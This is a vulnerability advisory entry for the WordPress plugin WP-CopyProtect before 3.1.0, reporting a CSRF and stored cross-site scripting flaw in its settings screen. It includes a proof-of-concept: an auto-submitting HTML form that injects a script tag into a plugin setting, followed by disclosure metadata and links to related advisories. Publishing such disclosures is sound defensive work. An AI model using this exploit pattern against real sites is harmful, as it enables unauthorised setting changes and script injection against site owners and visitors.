WP-CopyProtect < 3.1.0 – CSRF & Stored Cross-Site Scripting (XSS) | Plugin Vulnerabilities

Description

The WP-CopyProtect [Protect your blog posts] plugin for WordPress is vulnerable to a Persistent XSS attack on the settings screen, due to a lack of sanitation of user input, and lack of Cross-Site Request Forgery (CSRF) token (nonce).

Proof of Concept

<form id="form" method="POST" action="http://localhost/wp-admin/admin.php?page=wpcopyprotect">
        <input type="hidden" name="CopyProtect_nrc" value="2"/>
        <input type="hidden" name="CopyProtect_nrc_text" value='"><script>alert(1)</script>'/>
        <input type="hidden" name="CopyProtect_user_settings" value="2"/>
        <input type="hidden" name="CopyProtect_save" value="Save Settings"/>
</form>
<script>
        document.getElementById("form").submit();
</script>

Affects Plugins

Fixed in 3.1.0

References

URL

https://g0blin.co.uk/g0blin-00054/

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

Miscellaneous

Submitter

James Hooker

Submitter website

https://research.g0blin.co.uk

Submitter twitter

Verified

No

WPVDB ID

a2570cf2-8c5e-49c4-8aef-957870d5247a

Timeline

Publicly Published

2015-06-30 (about 10 years ago)

Added

2015-06-30 (about 10 years ago)

Last Updated

2019-10-21 (about 6 years ago)

Other

Published

Title

Published

2022-09-01

Title

Word Search Puzzles Game <= 2.0.1 - Author+ Stored Cross-Site Scripting

Published

2024-04-08

Title

Leaflet Maps Marker (Google Maps, OpenStreetMap, Bing Maps) < 3.12.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Published

2022-02-23

Title

Amelia < 1.0.46 - Reflected Cross-Site Scripting

Published

2014-08-01

Title

Dexs PM System 1.0.1 - Private Message subject Parameter Stored XSS

Published

2026-02-10

Title

HTML Shortcodes <= 1.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes